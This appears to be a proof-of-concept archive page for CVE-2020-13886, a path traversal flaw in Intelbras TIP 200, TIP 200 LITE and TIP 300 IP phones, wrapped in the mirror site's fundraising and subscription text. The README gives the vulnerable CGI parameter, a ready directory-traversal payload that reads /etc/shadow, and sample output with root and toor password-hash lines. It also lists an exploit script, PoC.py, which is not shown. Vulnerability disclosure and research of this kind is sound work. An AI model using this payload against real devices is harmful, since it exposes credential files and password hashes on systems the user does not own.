Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-13886 PoC — 多款 Intelbras 产品路径遍历漏洞

Source
Associated Vulnerability
Title:多款 Intelbras 产品路径遍历漏洞 (CVE-2020-13886)
Description:Intelbras TIP 200 60.61.75.15, TIP 200 LITE 60.61.75.15, and TIP 300 65.61.75.22 devices allow cgi-bin/cgiServer.exx?page=../ Directory Traversal.
Description
Exploit CVE-2020-13886 - LFI Intelbras TIP 200 / 200 LITE / 
Readme
PoC: https://youtu.be/nNKBRx8IglI
    
    -------------------------------------------------------------------------------------------------------------
    ------------- 0day: TELEFONE IP TIP200/200 LITE & TIP 300 | Local File Include | ----------------------------
    ------------------------------- P0c Author: Lucas Souza | Pentester at ProsecT ------------------------------
    -------------------------------------------------------------------------------------------------------------

URL parameter ->http://HOST/cgi-bin/cgiServer.exx?page=

LFI payload -> ../../../../etc/shadow

    root:$1$.jKlhz0B$/Nmgj0klrsZk0nYc1BLUR/:11876:0:99999:7:::
    toor:$1$6sa7xxqo$eV3t7Nb1tPqjOWT1s3/ks1:11876:0:99999:7:::

                                                                                 https://prosect.com.br/
File Snapshot

[4.0K] /data/pocs/efccc013ded617ad0caf15b10b6e8eb447b95b4e ├── [2.0K] PoC.py └── [ 824] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →